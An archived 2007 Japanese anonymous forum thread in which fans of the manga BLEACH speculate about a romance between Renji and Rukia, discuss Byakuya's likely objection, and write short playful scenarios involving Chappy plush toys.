115 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 01:17:36 ID:9x+44Mzf
>>114
二番隊は隊長が隠密機動の軍団長と兼任してる分、隊の雰囲気が軍隊ぽいと思ってた
隊士募集では「命を捨てる覚悟のあるもの」って書いてあった気がするから
そんなとこにルキアは無理かなと

兄様に白帝剣出させるくらいまでやらないと
駆け落ち以外にルキアを娶るのは無理か……

116 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 03:15:46 ID:ohih0FpU
なんでそこまで白哉にこだわらないといけないの?

117 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 04:51:29 ID:zxuSoE4U
白哉が二人の恋路に立ちはだかるチョモランマだから

118 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 10:01:54 ID:DUqy0OMW
>>110
なんかのマンガって…BLEACHではないのか??

119 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 12:54:21 ID:4v2gfKFe
>>118
BLEACHでこんなやり取りあった?
なんかWJ系じゃなかった気がするんだよね。
ずいぶん昔に読んだヤツだから間違ってるかもしれんけどたぶんサ○デー。

120 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 14:29:08 ID:z2fff9nr
どっかのスレから拾ってきた身長差カップル
http://image52.webshots.com/152/0/27/98/468702798BgwBcE_ph.jpg


121 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 14:47:44 ID:DUqy0OMW
↑見れなかった・・

122 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 14:57:28 ID:NgLJMAHr
>>120
恋次とルキアもこれくらい差があるんだよね?ルキアは華奢だから更に…
恋ルキに変換して萌えたw


123 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 15:51:53 ID:bW0FHi1z
>>120
何センチなんだろ
兄ちゃん、ネクタイ特注かな?w
しかしこれで、グーパンチでのけぞらせるには
かがんでもらわんといかんなw

124 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 23:46:58 ID:Nh7fWLiO
処刑の一件から心情の変化で白哉はルキアが
結婚したいと言えば表立って反対しないと思う
でもルキアは恋愛は仕事が一人前になって
からと意識がありそう

125 :名無しさん@自治スレでローカルルール変更議論中:2007/12/03(月) 00:29:17 ID:jN7WLNU8
ルキアにスッパリフラれる恋次…

126 :名無しさん@お腹いっぱい。:2007/12/03(月) 01:10:22 ID:t3Y7xs7u
>>124
同意。白哉よりルキアのほうが難関だと思う
恋愛なんかより死神としての自立優先、仕事一筋みたいな感じだからな…
年が来れば意識も変わるというけど長生きの死神の場合
いつがお年頃なのかわからんのがまた問題

127 :名無しさん@お腹いっぱい。:2007/12/03(月) 10:02:42 ID:dvJ4fWKj
チャッピィ・グッズを欲しがるお年頃だもんなぁ
恋次ももうちょっと刺激してやらんと
いつになったら芽がでるかわからんぞ

とジャガイモ扱いしてみる

128 :名無しさん@お腹いっぱい。:2007/12/03(月) 16:55:04 ID:MJoMPjcE
二人ともまだ仕事一筋な感じかな?
恋次はルキアがチャッピー好きと知ってるのかな。
誕生日のプレゼントにそっとウサギのぬいぐるみを渡す恋次…

129 :名無しさん@お腹いっぱい。:2007/12/03(月) 21:50:32 ID:gt6uMTnE
ありがとう、恋次
去年のクリスマスに誰か屋敷のものが
チャッピィのぬいぐるみを枕元においてくれたようなのだが
お前が頼んでくれてたのか

愕然とする恋次

130 :名無しさん@お腹いっぱい。:2007/12/04(火) 13:02:14 ID:TSrzvi5A
>>129
それよりも一回り小さいぬいぐるみを渡そうと買っていて
結局渡せなくなってしまった恋次
……カワイソス(´・ω・)

>>127
ふと、成長して毒婦になったルキア想像してしまった
恋次を翻弄するルキア……

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)